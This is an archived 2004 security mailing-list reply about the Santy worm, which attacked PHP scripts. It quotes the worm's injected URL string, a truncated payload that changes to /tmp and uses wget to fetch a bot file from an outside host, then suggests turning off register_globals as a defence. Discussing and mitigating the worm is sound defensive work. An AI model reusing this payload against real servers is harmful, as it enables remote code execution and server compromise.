| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Message-ID: <Pine.LNX.4.61.0412252158470.19736@netcore.fi> From: pekkas at netcore.fi (Pekka Savola) Subject: Re: New Santy-Worm attacks *all* PHP-skripts On Sat, 25 Dec 2004, Juergen Schmidt wrote: > It uses the brasilian Google site to find all kinds of PHP skripts. > It parses their URLs and overwrites variables with strings like: > > 'http://www.visualcoders.net/spy.gif?&cmd=cd /tmp;wget > www.visualcoders.net/spybot.txt;... And AFAICS, this can be prevented by setting register_globals=off in php.ini. -- Pekka Savola "You each name yourselves king, yet the Netcore Oy kingdom bleeds." Systems. Networks. Security. -- George R.R. Martin: A Clash of Kings
Powered by blists - more mailing lists